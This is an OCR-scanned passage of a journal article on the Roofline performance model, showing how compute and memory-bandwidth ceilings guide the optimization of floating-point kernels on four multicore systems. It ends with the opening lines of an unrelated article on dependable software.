performance. 

To illustrate, we compare the Opter- 
on X2 with two cores in Figure 1a to its 


| successor, the Opteron X4 with four 


cores. To simplify board design, they 
share the same socket. Hence, they 
have the same DRAM channels and 
can thus have the same peak memory 
bandwidth, although prefetching is 
better in the X4. In addition to dou- 
bling the number of cores, the X4 
also has twice the peak floating-point 
performance per core; X4 cores can 
issue two floating-point SSE2 instruc- 
tions per clock cycle, whereas X2 cores 
can issue two instructions every other 
clock. As the clock rate is slightly fast- 
er—2.2GHz for X2 vs. 2.3GHz for X4— 
the X4 is able to achieve slightly more 
than four times the peak floating-point 
performance of the X2 with the same 
memory bandwidth. 

Figure 1b compares the Roofline 
models for these two systems. As ex- 
pected, the ridge point shifts right 
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from 1.0 Flops/Byte in the Opteron X2 
to 4.4 in the Opteron X4. Hence, to re- 
alize a performance gain using the X4, 
kernels need an operational intensity 
greater than 1.0 Flops/Byte. 


Adding Ceilings to the Model 
The Roofline model provides an upper 
bound to performance. Suppose a pro- 


gram performs far below its Roofline. | 
What optimizations should one im- | 


plement and in what order? Another 
advantage of bound-and-bottleneck 
analysis is that “a number of alterna- 
tives can be treated together, with a 
single bounding analysis providing 
useful information about them all.””° 
We leverage this insight to add mul- 


tiple ceilings to the Roofline model to | 


guide which optimizations to imple- 
ment. It is similar to the guidelines 
loop balance gives the compiler. We 
can think of each optimization as a 
“performance ceiling” below the ap- 
propriate Roofline, meaning you can- 
not break through a ceiling without 


first performing the associated opti- | 


mization. 

For example, to reduce computa- 
tional bottlenecks on the Opteron X2, 
almost any kernel can be helped with 
two optimizations: 

Improve instruction-level parallelism 
(ILP) and apply SIMD. For superscalar 
architectures, the highest performance 
comes when fetching, executing, and 
committing the maximum number 


of instructions per clock cycle. The | 


goal is to improve the code from the 
compiler to increase ILP. The highest 
performance comes from completely 
covering the functional unit latency. 
One way to hide instruction latency is 


by unrolling loops. For x86-based ar- | 
chitectures, another way is using float- 


ing-point SIMD instructions whenever 
possible, since a SIMD instruction op- 
erates on pairs of adjacent operands; 
and 

Balance floating-point operation mix. 


The best performance requires that | 


a significant fraction of the instruc- 
tion mix be floating-point operations 
(discussed later). Peak floating-point 
performance typically also requires 
an equal number of simultaneous 
floating-point additions and multipli- 
cations, since many computers have 
multiply-add instructions or an equal 
number of adders and multipliers. 
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Figure 2: Roofline model with ceilings for Opteron X2. 
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Memory bottlenecks can be reduced 
with the help of three optimizations: 

Restructure loops for unit stride ac- 
cesses. Optimizing for unit-stride 
memory accesses engages hardware 
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prefetching, significantly increasing 
memory bandwidth; 

Ensure memory affinity. Most micro- 
processors today include a memory 
controller on the same chip with the 


contributed articles 


optimizations to tty. The middle of 

Figure 2c shows that computational 

optimizations and memory bandwidth 

optimizations overlap; we picked the 

Intel Xeon AMD Opteron — Sun UltraS- colors to highlight this overlap. For 

(Clovertown, X4 (Barcelona, PARC T2+ example, Kernel 2 falls in the blue 

MPU Type e5345) 2356) (Niagara 2,5120) IBM Cell (QS20) trapezoid on the right, suggesting the 

x86/64 x86/64 SPARC Cell SPEs programmer should work only on the 

ISA | computational optimizations. If a ker- 

8 8 128 “16 nel fell in the yellow triangle on the 

Total Threads lower left, the model would suggest 

a ' 8 8 a8 16 _ trying just memory optimizations. Ker- 

Total Cores nel 1 falls in the green (= yellow + blue) 

= 2 2 2 2 parallelogram in the middle, suggest- 

Total | ing the programmer try both types of 

Sockets optimization. Note that the Kernel 1 

2.33 2.30 117 3.20 vertical line falls below the floating- 

GHz point imbalance optimization, so opti- 
75 74 19° 29 mization 2 may be skipped. 

Peak GFlops/sec | The ceilings of the Roofline model 

‘21.3r, 2x106—t—~<Ct«t:*s 2x 21.34, 2x 25.6 suggest which optimizations the pro- 

Peak DRAM 10.6w 2x 10.6w | grammer should perform. The height 

GB/sec of the gap between a ceiling and the 

2 59 16.6 26.0 47.0 next higher ceiling is the potential 

Stream reward for trying this optimization. 

GB/sec Thus, Figure 2 suggests that optimiza- 

-_ FBDIMM DDR2 ~ FBDIMM XDR tion 1, which improves ILP/SIMD, has 

DRAM Type a large potential benefit for optimizing 

computation on that computer, and 

optimization 4, which improves mem- 

ory affinity, has a large potential ben- 


processors. If the system has two mul- 
ticore chips, then some addresses go 
to the DRAM local to one multicore 
chip, and the rest go over a chip inter- 
connect to access the DRAM local to 
another chip. The latter lowers per- 


formance. This optimization allocates | 


data and the threads tasked to that 
data to the same memory-processor 


pair, so the processors rarely have to | 


access the memory attached to other 
chips; and 

Use software prefetching. The high- 
est performance usually requires keep- 
ing many memory operations in flight, 
which is easier to do via prefetching 
than by waiting until the data is actual- 
ly requested by the program. On some 
computers, software prefetching de- 
livers more bandwidth than hardware 
prefetching alone. 

Like the computational Roofline, 
computational ceilings can come from 
an optimization manual,’ though it’s 
easy to imagine collecting the nec- 
essary parameters from simple mi- 
crobenchmarks. The memory ceilings 
require running experiments on each 
computer to determine the gap be- 


tween them (see online Appendix A.1). 
The good news is that like the Roof- 
line, the ceilings must be measured 
only once per multicore computer. 
Figure 2 adds ceilings to the Roof- 
line model in Figure la; Figure 2a 
shows the computational ceilings and 
Figure 2b the memory bandwidth ceil- 
ings. Although the higher ceilings are 
not labeled with lower optimizations, 
these lower optimizations are implied; 
to break through a ceiling, the pro- 
grammer must have already broken 
through all the ones below. Figure 2a 
shows the computational “ceilings” 
of 8.8 GFlops/sec if the floating-point 
operation mix is imbalanced and 2.2 
GFlops/sec if the optimizations to in- 
crease ILP or SIMD are also missing. 


Figure 2b shows the memory band- | 


width ceilings of 11 GB/sec without 
software prefetching, 4.8 GB/sec with- 
out memory affinity optimizations, 
and 2.7 GB/sec with only unit stride 
optimizations. 

Figure 2c combines Figures 2a and 
2b into a single graph. The operational 
intensity of a kernel determines the 


| optimization region, and thus which 
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efit for improving memory bandwidth 
on that computer. 

The order of the ceilings suggests 
the optimization order, so we rank 
the ceilings from bottom to top; those 
most likely to be realized by a compiler 
or with little effort by a programmer 
are at the bottom and those that are 
difficult for a programmer to imple- 
ment or inherently lacking in a kernel 
are at the top. The one quirky ceiling is 
floating-point balance, since the actu- 
al mix depends on the kernel. For most 
kernels, achieving parity between mul- 
tiplies and additions is difficult, but 
for a few kernels, parity is natural. One 
example is sparse matrix-vector mul- 
tiplication; for this domain, we would 
place floating-point mix as the lowest 
ceiling, since it is inherent. Like the 
3Cs model, as long as the Roofline 
model delivers on insight, it need not 
be perfect. 


_ Tying the 3Cs to 
| Operational Intensity 
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Operational intensity tells program- 
mers which ceilings need the most 
attention. Thus far, we have assumed 
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that the operational intensity is fixed, 
though this is not always the case; for 
example, for some kernels, the opera- 


tional intensity increases with prob- | 


lem size (such as for Dense Matrix and 
FFT problems). 

Caches filter the number of access- 
es that go to memory, so optimizations 
that improve cache performance in- 
crease operational intensity. Thus, we 
may couple the 3Cs model to the Roof- 
line model. Compulsory misses set the 
minimum memory traffic and hence 
the highest possible operational in- 
tensity. Memory traffic from conflict 


and capacity misses can considerably | 


lower the operational intensity of a 
kernel, so we should try to eliminate 
such misses. 

For example, we can reduce traffic 
from conflict misses by padding arrays 
to change cache line addressing. A sec- 
ond example is that some computers 
have anon-allocating store instruction, 
so stores go directly to memory and do 
not affect caches. This approach pre- 
vents loading a cache block with data 
to be overwritten, thereby reducing 
memory traffic. It also prevents dis- 


placing useful items in the cache with | 


data that will not be read, thereby sav- 
ing conflict misses. 

This shift of operational intensity to 
the right could put a kernel in a differ- 
ent optimization region. Generally, we 
advise improving operational inten- 
sity of the kernel before implementing 
other optimizations. 


Demonstrating the Model 
To demonstrate the Roofline model’s 
utility, we now construct Roofline 


models for four recent multicore com- | 


puters and then optimize four floating- 
point kernels. We’ll then show that the 
ceilings and rooflines bound the ob- 
served performance for all computers 
and kernels. 

Four diverse multicore computers. 
Given the lack of conventional wisdom 
concerning multicore architecture, it’s 
not surprising that there are as many 
different designs as there are chips. 
Table 1 lists the key characteristics of 
the four multicore computers, all dual- 
socket systems, that we discuss here. 


The Intel Xeon uses relatively so- | 


phisticated processors, capable of 


executing two SIMD instructions per | 
clock cycle that can each perform two | 
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double-precision floating-point opera- 
tions. It is the only one of the four ma- 
chines with a front-side bus connect- 
ing toacommon north bridge chip and 
memory controller. The other three 
have the memory controller on chip. 
The Opteron X4 also uses sophis- 
ticated cores with high peak floating- 
point performance but is the only 
computer of the four with on-chip L3 


| caches. The two sockets communicate 


over separate, dedicated hypertrans- 
port links, making it possible to build 
a “glueless” multi-chip system. 

The Sun UltraSPARC T2+ uses rela- 
tively simple processors at a modest 
clock rate compared to the other three, 


| allowing it to have twice as many cores 


per chip. It is also highly multithread- 


ed, with eight hardware-supported | 


threads per core. It has the highest 


memory bandwidth of the four, as | 


each chip has two dual-channel mem- 
ory controllers that can drive four sets 
of DDR2/FBDIMMs. 

The clock rate of the IBM Cell QS20 


is the highest of the four multicores at | 


3.2GHz. It is also the most unusual of 
the four, with a heterogeneous design, 
a relatively simple PowerPC core, and 
eight synergistic processing elements 
(SPEs) with their own unique SIMD-style 
instruction set. Each SPE also has its 
own local memory, instead of a cache. 
An SPE must transfer data from main 


memory into the local memory to oper- 
ate on it and then back to main memory 
when the computation is completed. It 
uses Direct Memory Access, which has 
some similarity to software prefetching. 
The lack of caches means porting pro- 
grams to Cell is more challenging. 
Four diverse floating-point ker- 
nels. Rather than pick programs from 
a standard parallel benchmark suite 
(such as Parsec*® and Splash-2*°), we 
were inspired by the work of Phil 
Colella,'! an expert in scientific com- 
puting at Lawrence Berkeley National 
Laboratory, who identified seven nu- 
merical methods he believes will be 
important for computational science 
and engineering for at least the next 
decade. Because he identified seven, 
they are called the Seven Dwarfs and 
are specified at a high level of ab- 
straction to allow reasoning about 
their behavior across a broad range 
of implementations. The widely read 
“Berkeley View” report? found that 
if the data types were changed from 
floating point to integer, the same 
Seven Dwarfs would also be found in 
many other programs. Note that the 
claim is not that the Dwarfs are easy to 
parallelize but that they will be impor- 
tant to computing in most current and 
future applications; designers are thus 
advised to make sure they run well on 
the systems they create, whether or 


im™ table 2: Characteristics of four floating-point kernels. 


Name Operational Intensity 


SpMv?° 0.17 to 0.25 


Description 


Sparse Matrix-Vector 
multiply: y = A*x where A is 
a sparse matrix and x, y are dense 


vectors; multiplies and adds equal. 


LBMHD”* 0.70 to 1.07 


Lattice-Boltzmann 
Magnetohydro-dynamics is 
a structured grid code with 


a series of time steps. 


Stencil’? 0.33 to 0.50 


A multigrid kernel that 
updates seven nearby points in a 3D 
stencil for a 256% problem. 


3D FFT 1.09 to 1.64 


3D Fast Fourier Transform 
(2 sizes: 128° and 512°). 
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Figure 3a—3c: Roofline model for Intel Xeon, AMD Opteron X4, and IBM Cell. 
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not those systems are parallel. 

One advantage of using these high- 
er-level descriptions of programs is 
that we are not tied to code that might 
have been originally written to opti- 
mize an old computer to evaluate fu- 
ture systems. Another advantage of the 
restricted numberis that efficiency-lev- 
el programmers can create autotuners 


| for each kernel that would search the 


alternatives to produce the best code 
for that multicore computer, includ- 
ing extensive cache optimizations." 
Table 2 lists the four kernels from 
among the Seven Dwarfs we use to dem- 


_ onstrate the Roofline model on the four 


multicore computers listed in Table 1; 
the autotuners discussed in this sec- 
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tion are from three sources:!***:”° 

For these kernels, there is sufficient 
parallelism to utilize all the cores and 
threads and keep them load balanced; 
see online Appendix A.2 for how to han- 
dle cases when load is not balanced. 

Roofline models and results. Figure 
3 shows the Roofline models for Xeon, 
x4, and Cell. The pink vertical dashed 
lines indicate the operational inten- 
sity and the red X marks performance 
achieved for that particular kernel. 
However, achieving balance is difficult 
for the others. Hence, each computer 
in Figure 3 has two graphs: the left one 
has multiply-add balance as the top 
ceiling and is used for Lattice-Boltz- 
mann Magnetohydrodynamics (LB- 
MHD), Stencil, and 3D FFT; the right 
one has multiply-add as the bottom 
ceiling and is used for SpMV. Since the 
T2+ lacks a fused multiply-add instruc- 
tion nor can it simultaneously issue 
multiplies and adds, Figure 4 shows a 


| single roofline for the four kernels on 


the T2+ without the multiply-add bal- 
ance ceiling. 

The Intel Xeon has the highest peak 
double-precision performance of the 
four multicores. However, the Roofline 
model in Figure 3a shows this level of 
performance can be achieved only with 


| operational intensities of at least 6.7 


Flops/Byte; in other words Clovertown 
requires 55 floating-point operations 


| for every double-precision operand 
| (8B) going to DRAM to achieve peak 
_ performance. This high ratio is due in 


part to the limitation of the front-side 
bus, which also carries the coherency 
traffic that can consume up to half the 
bus bandwidth. Intel includes a snoop 
filter to prevent unnecessary coheren- 
cy traffic on the bus. If the working set 
is small enough for the hardware to fil- 
ter, the snoop filter nearly doubles the 
delivered memory bandwidth. 

The Opteron X4 has a memory 
controller on chip, its own path to 
667MHz DDR2 DRAM, and separate 
paths for coherency. Figure 3 shows 
that the ridge point in the Roofline 
model is to the left of the Xeon, at an 
operational intensity of 4.4 Flops/Byte. 
The Sun T2+ has the highest memory 
bandwidth so the ridge point is an ex- 
ceptionally low operational intensity 
of just 0.33 Flops/Byte. It keeps mul- 
tiple memory transfers in flight by us- 
ing many threads. The IBM Cell ridge 
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point of operational intensity is 0.65 
Flops/Byte. 
Here, we demonstrate the Roofline 


| Figure 3d—3f: Roofline model for Intel Xeon, AMD Opteron X4, and IBM Cell. 


model on four diverse mutlicore archi- | 


tectures running four kernels repre- 
sentative of some of the Seven Dwarfs: 

Sparse matrix-vector multiplication. 
The first example kernel of the sparse 
matrix computational dwarf is Sparse 
Matrix-Vector multiply (SpMV); the 
computation is y = A*x, where A is a 
sparse matrix and x and y are dense 
vectors. SpMV is popular in scientific 
computing, economic modeling, and 


information retrieval. Alas, conven- | 


tional implementations often run at 
less than 10% of peak floating-point 
performance in uniprocessors. One 
reason is the irregular accesses to 
memory, which might be expected 
from sparse matrices. The operational 
intensity varies from 0.17 Flops/Byte 
before a register blocking optimiza- 
tion to 0.25 Flops/Byte afterward” (see 
online Appendix A.1). 

Given that the operational intensity 
of SpMV was below the ridge point of 
all four multicores in Figure 3, most 
optimizations involve the memory sys- 
tem. Table 3 summarizes the optimi- 
zations used by SpMV and the rest of 
the kernels. Many are associated with 
the ceilings in Figure 3, and the height 
of the ceilings suggests the potential 
benefit of these optimizations. 


Lattice-Boltzmann Magnetohydrody- | 


namics. Like SpDMV, LBMHD tends to 
achieve a small fraction of peak per- 
formance on uniprocessors due to the 
complexity of the data structures and 
the irregularity of memory access pat- 
terns. The Flop-to-Byte ratio is 0.70 
vs. 0.25 or less in SpMV. By using the 
no-allocate store optimization, a pro- 
grammer can improve the operational 
intensity of LBMHD to 1.07 Flops/ 
Byte. Both x86 multicores offer this 


cache optimization, but Cell does not | 


have this problem since it uses DMA. 
Hence, T2+ is the only one of the four 
computers with the lower intensity of 
0.70 Flops/Byte. 

Figures 3 and 4 show that the op- 


erational intensity of LBMHD is high | 


enough that both computational and 
memory bandwidth optimizations 
make sense on all multicores, except 
the T2+ where the Roofline ridge point 
is below that of LBMHD. The T2+ 
reaches its performance ceiling using 
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only the computational optimizations. 

Stencil. In general, a stencil on a 
structured grid is defined as a function 
that updates a point based on the val- 
ues of its neighbors. The stencil struc- 


ture remains constant as it moves from | 


one point in space to the next. For this | 
work, we use the stencil derived from | 
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the explicit heat equation, a partial dif- 
ferential equation on a uniform 2563 
3D grid.’* The stencil’s neighbors are 
the nearest six points along each axis, 
as well as the center point itself. This 
stencil performs eight floating-point 
operations for every 24B of compul- 
sory memory traffic on write-allocate 


Figure 4: Roofline model for Sun UltraSPARC T2+. 
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Figure 5: Roofline for transpose phase of 3D FFT for the Cell. 
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architectures, yielding an operational 
intensity of 0.33 Flops/Byte. 

3D FFT. This fast Fourier transform 
is the classic divide-and-conquer algo- 
rithm that recursively breaks down a 
discrete Fourier transform into many 
smaller ones. The FFT is ubiquitous 
in many domains, including image 
processing and data compression. An 
efficient approach for 3D FFT is to per- 
form 1D transforms along each dimen- 
sion to maintain unit-stride accesses. 
We computed the 1D FFTs on Xeon, 
X4, and T2+ using an autotuned library 
(FFTW).'° For Cell, we implemented a 
radix-2 FFT. 

FFT differs from SpMV, LBMHD, 
and Stencil in that its operational in- 
tensity is a function of problem size. 
For the 128*- and 512*-point trans- 
forms we examine, the operational in- 
tensities are 1.09 and 1.41 Flops/Byte, 
respectively; Cell’s 1GB main memory 
is too small to hold 512° points, so we 
estimate this result. On Xeon and X4, 
an entire 128x128 plane fits in cache, 


increasing temporal locality and im- 
proving the intensity to 1.64 for the 
128*-point transform. 


Productivity vs. performance. In ad- | 
dition to performance, productivity (or | 


the programming difficulty of achiev- 
ing good performance) is another 
important issue for the parallel com- 
puting revolution.’ One question is 


whether a low ridge point gives insight | 


into productivity. 


The Sun T2+ (with the lowest ridge 


point of the four computers) was the 
easiest to program due to its large 


derstand cores. The advice for these 
kernels on T2+ is simply to try to get 
good-performing code from the com- 
piler, then use as many threads as 
possible. The downside is that the L2 
cache is only 16-way set associative, 
which can lead to conflict misses when 
64 threads access the cache, as it did 
for the Stencil kernel. 

In contrast, the computer with the 
highest ridge point had the lowest 
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unoptimized performance. The Intel 
Xeon was difficult to program because 
it was difficult to understand the mem- 
ory behavior of the dual front-side bus- 
es, how hardware prefetching worked, 
and the difficulty of getting good SIMD 
code from the compiler. The C code for 
both it and the Opteron X4 are liberally 
sprinkled with intrinsic statements in- 
volving SIMD instructions to get good 
performance. 

With a ridge point close to the 
Xeon, the Opteron X4 required about 
as much effort, since it benefited from 
the most types of optimization. How- 
ever, its memory behavior was easier to 
understand than the memory behavior 


_ of the Xeon. 


The IBM Cell (with a ridge point al- 
most as low as the Sun T2+) involved 
two types of challenges. First, it was 
difficult for the compiler to exploit the 
SIMD instructions of Cell’s SPE, so at 
times we needed to help the compiler 
by inserting intrinsic statements with 
assembly language instructions into 
the C code. This comment reflects the 
immaturity of the IBM compiler, as 
well as the difficulty of compiling for 
these SIMD instructions. Second, the 
memory system is more challenging. 
Since each SPE has local memory in a 
separate address space, we could not 
simply port the code and start running 
on the SPE. We needed to change the 
program to issue DMA commands to 
transfer data back and forth between 
local store and memory. The good 
news is that DMA played the role of 
software prefetch in caches. DMA fora 
local store is easier to program, achieve 
good memory performance, and over- 
lap with computation than scheduling 
prefetches for caches. 

To demonstrate the utility of the 
Roofline Model, Table 4 lists the up- 
per and lower bounding ceilings and 


_ the GFlops/sec and GB/sec per kernel- 
memory bandwidth and easy-to-un- | 


computer pair; recall that operational 
intensity is the ratio between the two 
rates. The ceilings listed are the ceil- 
ings sandwiching actual performance. 
All 16 combinations of kernel and 
computer validate this bound-and-bot- 
tleneck model since Roofline’s upper 
and lower ceilings bound performance 
and the kernels were optimized, as the 
lower ceilings suggest. The metric that 
limits performance is in bold; 15 of 16 
ceilings are memory-bound for Xeon 


NO. 4 COMMUNICATIONS OF THE ACM 73 


contributed articles 


Table 3: Kernel optimizations.’ 7° 7° 


Memory affinity. Reduce accesses to DRAM 
memory attached to the other socket. 


Long unit-stride accesses. Change loop 
structures to generate long unit-stride ac- 
cesses to engage the prefetchers; 

also reduces TLB misses. 


Software prefetching. Software and hardware 
prefetching both used to get the most 


from memory systems. 


Reduce conflict misses. Pad arrays to improve 


cache-hit rates. 


Unroll and reorder loops. To expose sufficient 
parallelism and improve cache utilization, 
unroll and reorder loops to group 
statements with similar addresses; 
improves code quality, reduces register 
pressure, facilitates SIMD. 


“SIMD-ize" code. The x86 compilers didn't 
generate good SSE code, so we made a code 


generator to produce SSE intrinsics. 


Compress data structures (SpMV only). Since 
bandwidth limits performance, we used 
smaller data structures: 16b vs. 32b 
index and smaller representations of 


non-zero subblocks.”’ 


and X4, while the bottleneck is almost 
evenly split for T2+ and Cell. For FFT, 
the surrounding ceilings are memory- 
bound for Xeon and X4, but compute- 
bound for T2+ and Cell. 


Fallacies About Roofline 

We have presented this material in sev- 

eral venues, prompting a number of 

misconceptions we address here: 
Fallacy: The model does not account 

for all features of modern processors 


prove memory performance. Similarly, 
some of the optimizations in Table 3 
explicitly involve memory. Moreover, 
in our discussion on tying the 3Cs to 
operational intensity, we demonstrat- 
ed the optimizations’ effect on increas- 
ing operational intensity by reducing 
capacity and conflict misses. 

Fallacy: Doubling cache size increases 


operational intensity. Autotuning three | 


of the four kernels gets very close to 


the compulsory memory traffic; the re- 


sultant working set is sometimes only 


_ a small fraction of the cache. Increas- 


ing cache size helps only with capacity 
misses and possibly conflict misses, 
so a larger cache has no effect on the 
operational intensity for the three ker- 
nels. However, for 128° 3D FFT, a larger 
cache could capture a whole plane of a 
3D cube, improving operational inten- 
sity by reducing capacity and conflict 
misses. 

Fallacy: The model doesn’t account 


for the long memory latency. The ceil- | 


ings for no software prefetching in 


| Figures 3 and 4 are at lower memory 


bandwidth precisely because they can- 
not hide the long memory latency. 


Fallacy: The model ignores integer | 


units in floating-point programs, pos- 


| sibly limiting performance. For the ex- 


ample kernels we’ve outlined here, the 
amount of integer code and integer 


| performance can affect performance. 


(such as caches and prefetching). The 


definition of operational intensity we 
use here does indeed factor-in caches; 
memory accesses are measured be- 
tween the caches and memory, not be- 
tween the processor and caches. In our 
discussion of performance models, we 
showed that the memory bandwidth 
measures of the computer include 
prefetching and any other optimiza- 
tion (such as blocking) that can im- 
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For example, the Sun UltraSPARC T2+ 
fetches two instructions per core per 
clock cycle and doesn’t implement the 
SIMD instructions of the x86 that can 


operate on two double-precision float- | 


ing-point operands at a time. Relative 
to other processors, the T2+ expends a 
larger fraction of its instruction issue 
bandwidth on integer instructions and 
executes them at a lower rate, hurting 
overall performance. 

Fallacy: The model has nothing to do 
with multicore. Little’s Law!” *° *! dic- 
tates that considerable concurrency is 
necessary to really push the limits of 
the memory system. This concurrency 
is more easily satisfied in a multicore 
than inauniprocessor. While the band- 
width orientation of the Roofline mod- 
el certainly works for uniprocessors, it 
is even more helpful for multicores. 

Fallacy: You need to recalculate the 
Roofline model for every kernel. The 
Roofline needs to be calculated for giv- 
en performance metrics and comput- 
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ers just once; it then guides the imple- 


| mentation for any program for which 


that metric is the critical performance 
metric. The kernels we’ve explored 
here use floating-point operations and 
main memory traffic. The ceilings are 
measured once but can be reordered 
depending on whether or not multi- 
plies and adds are naturally balanced 
in the kernel (see the earlier discus- 
sion on adding ceilings to the model). 

Note that the heights of the ceilings 
we discuss here document the maxi- 
mum potential gain of a code perform- 
ing this optimization. An interesting 
future direction is to use performance 
counters to adjust the height of the 
ceilings and the order of the ceilings 
for a particular kernel to show the ac- 
tual benefits of each optimization and 
the recommended order to try them 
(see online Appendix A.3). 

Fallacy: The model is limited to eas- 
ily optimized kernels that never hit in the 
cache. These kernels do indeed hit in 
the cache; for example, the cache-hit 
rates of our three multicores with on- 
chip caches are at least 94% for Sten- 
cil and 98% for FFT. Moreover, if the 
Seven Dwarfs were easy to optimize, it 
would bode well for the future of multi- 
cores. However, our experience is that 
it is not easy to create the fastest ver- 
sion of these numerical methods on 
the divergent multicore architectures 
discussed here. Indeed, three of the re- 
sults were judged significant enough 
to be accepted for publication at major 
conferences.'* 7%? 

Fallacy: The model is limited to float- 
ing-point programs. Our focus here has 
been on floating-point programs, so 
the two axes of the model are floating- 
point operations per second and the 
floating-point operational intensity of 
accesses to main memory. However, 
the Roofline model can work for other 


_ kernels where performance is a func- 


tion of different performance metrics. 
A concrete example is the transpose 
phase of 3D FFT, which performs no 
floating-point operations at all. Figure 
5 shows a Roofline model for just this 
phase on Cell, with exchanges replac- 
ing Flops in the model. One exchange 
involves reading and writing 16B, so 
its operational intensity is 1/32 pair- 
wise Exchanges/Byte. Despite the com- 
putational metric being memory ex- 
changes, there is still a computational 
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Table 4: Achieved performance and nearest Roofline ceilings, with metric limiting performance in bold (3D FFT is 128°) 


Upper Ceiling Achieved Performance Lower Ceiling 

Kernel Type Name Value Compute Memory O.I. Type Name Value 

SpMV Memory Stream BW 11.2GB/sec 2.8GFlops/sec 11.1GB/sec 0.25 Memory Snoop filter 5.9GByte/sec 
Intel LBMHD Memory — Snoop filter 5.9GB/sec 5.6GFlops/sec 5.3GB/sec 1.07 Memory (none) O.OGByte/sec 
Xeon 

Stencil Memory — Snoop filter 5.9GB/sec 2.5GFlops/sec 5.1GB/sec 0.50 Memory (none) O.OGByte/sec 

SBIFFI Memory — Snoop filter 5.9GB/sec 9.7GFlops/sec 5.9GB/sec 1,64 Compute TLP only 6.2GFlops/sec 

SpMV Memory Stream BW 17.6GB/sec 4.2GFlops/sec 16.8GB/sec 0.25 Memory Copy BW 13.9GByte/sec 
AMD LBMHD Memory Copy BW 13,.9GB/sec 11.4GFlops/sec 10.7GB/sec 1.07 Memory No Affinity 7.OGByte/sec 
X4 

Stencil Memory Stream BW 17.6GB/sec 8.0GFlops/sec 16.0GB/sec 0.50 Memory Copy BW 13.9GByte/sec 

BD) FBT Memory Copy BW 13.9GB/sec 14.0GFlops/sec 8.6GB/sec 1.64 Memory No Affinity 7.OGByte/sec 

SpMV Memory Stream BW 36,7GB/sec 7.3GFlops/sec 29.1GB/sec 0.25 Memory No Affinity 19,8GByte/sec 
Sun LBMHD Memory No Affinity 19,.8GB/sec 10.5GFlops/sec 15.0GB/sec 0.70 Compute 25% issuedFP 9.3GFlops/sec 
T2+ 

Stencil Compute 25%issuedFP 9,3GFlopss/sec 6.8GFlops/sec 20,.3GB/sec 0.33 Memory No Affinity 19,8GByte/sec 

3D FFT Compute Peak DP 19.8GFlops/sec 9.2GFlops/sec 10.0GB/sec 1.09 Compute 25% issuedFP 9.3GFlops/sec 

SpMV Memory Stream BW 47.6GB/sec 11.8GFlops/sec 47.1GB/sec 0.25 Memory FMA 7.3GFlops/sec 
IBM LBMHD Memory No Affinity 23.8GB/sec 16.7GFlops/sec 15.6GB/sec 1.07 Memory Without FMA — 14.6GFlops/sec 
Cell 

Stencil Compute Without FMA 14.6GFlopss/sec 14.2GFlops/sec 30,2GB/sec 0.47 Memory No Affinity 23.8GByte/sec 

3D FFT Compute Peak DP 29.3GFlops/sec 15.7GFlops/sec 14.4GB/sec 1.09 Compute SIMD 14.6GFlops/sec 


horizontal Roofline, since local stores 
and caches could affect the number of 
exchanges that go to DRAM. 

Fallacy: The Roofline model must 
use DRAM bandwidth. If the working 
set fits in the L2 cache, the diagonal 
Roofline could be L2 cache bandwidth 
instead of DRAM bandwidth, and the 
operational intensity on the x-axis 
would be based on Flops per L2 cache 
Byte accessed. The diagonal memory 
performance line would move up, and 
the ridge point would surely move to 
the left. For example, Jike Chong of 
the University of California, Berkeley, 
ported two financial partial differ- 
ential equation (PDE) solvers to four 
other multicore computers: the Intel 
Penryn and Larrabee and NVIDIA G80 


and GTX280.'° He used the Roofline 
model to keep track of all four of their 
peak arithmetic throughput and L1, 
L2, and DRAM bandwidths. By analyz- 
ing an algorithm’s working set and op- 
erational intensity, he was able to use 
the Roofline model to quickly estimate 
the needs for algorithmic improve- 
ment. Specifically, for the option- 
pricing problem with an implicit PDE 
solver, the working set is small enough 
to fit into L1, and the L1 bandwidth is 
sufficient to support peak arithmetic 
throughput; the Roofline model thus 
indicates that no optimization is nec- 
essary. For option pricing with an ex- 
plicit PDE formulation, the working 
set is too large to fit into cache, and the 
Roofline model helps indicate the ex- 
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tent cache blocking is necessary to pro- 
duce peak arithmetic performance. 


Conclusion 
The sea change from sequential com- 
puting to parallel computing is in- 
creasing the diversity of computers 
that programmers must confront 
when building correct, efficient, scal- 
able, portable software.‘ Here, we’ve 
described a simple, visual computa- 
tional model we call the Roofline Mod- 
el to help identify which systems would 
be a good match for important kernels 
or conversely to determine how to 
change kernel code or hardware to run 
desired kernels well. For floating-point 
kernels that do not fit completely in 
' caches, we’ve shown how operational 
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intensity—the number of floating- 
point operations per byte transferred 
from DRAM—is an important param- 
eter for both the kernels and the multi- 
core computers. 

We applied Roofline to four kernels 
from among the Seven Dwarfs’ to 
four recent multicore designs: AMD 
Opteron X4, Intel Xeon, IBM Cell, and 
Sun 12+. The ridge point—the mini- 
mum operational intensity to achieve 
maximum performance—proved to 
be a better predictor of performance 
than clock rate or peak performance. 
Cell offered the highest attained per- 
formance (GFlops/sec) on these ker- 
nels, but T2+ was the easiest computer 
on which to achieve its highest per- 
formance. One reason is because the 
ridge point of the Roofline Model for 
T2+ was the lowest. 

Just as the graphical Roofline Mod- 


el offers insights into the difficulty of | 


achieving the peak performance of a 
computer, it also makes obvious when 
a computer is imbalanced. The opera- 
tional ridge points for the two x86 com- 
puters were 4.4 and 6.7—meaning a 35 
to 55 Flops/Byte operand that accesses 
DRAM-—yet the operational intensi- 
ties for the 16 combinations of kernels 
and computers in Table 4 ranged from 
0.25 to just 1.64, with a median of 0.60 
Flops/Byte. Architects should keep the 
ridge point in mind if they want pro- 
grams to reach peak performance on 
their new designs. 

We measured the roofline and ceil- 
ings using microbenchmarks but 
could have used performance coun- 
ters (see online Appendix A.1 and 
A.3). There may indeed be a synergis- 
tic relationship between performance 
counters and the Roofline Model. The 
requirements for automatic creation 
of a Roofline model could guide the 
designer as to which metrics should 
be collected when faced with literally 
hundreds of candidates but only a lim- 
ited hardware budget.° 

Roofline offers insights into other 
types of multicore systems (such as vec- 
tor processors and graphical process- 
ing units); other kernels (such as sort 
and ray tracing); other computational 
metrics (such as pair-wise sorts per 
second and frames per second); and 
other traffic metrics (such as L3 cache 
bandwidth and I/O bandwidth). Alas, 
there are many more opportunities 
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for Roofline-oriented research than we 
can pursue. We thus invite others to 
join us in the exploration of the effec- 
tiveness of the Roofline Model. 
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A Direct Path | 
to Dependable 
Software 


SOFTWARE PLAYS A fundamental role in our 
society, bringing enormous benefits to all fields. 


But because many of our current systems are 
highly centralized and tightly coupled,*’ we 
are also susceptible to massive and 
coordinated failure. 

A Chicago hospital lost its entire pharmacy 
database one night, and it was only able 
to reconstruct medication records for its 
patients by collecting paper printouts 
from nurses’ stations. In their report on 
this incident,° Richard Cook and Michael 
O’Connor concluded: “Accidents are 
signals sent from deep within the system 


about the sorts of vulnerability and 
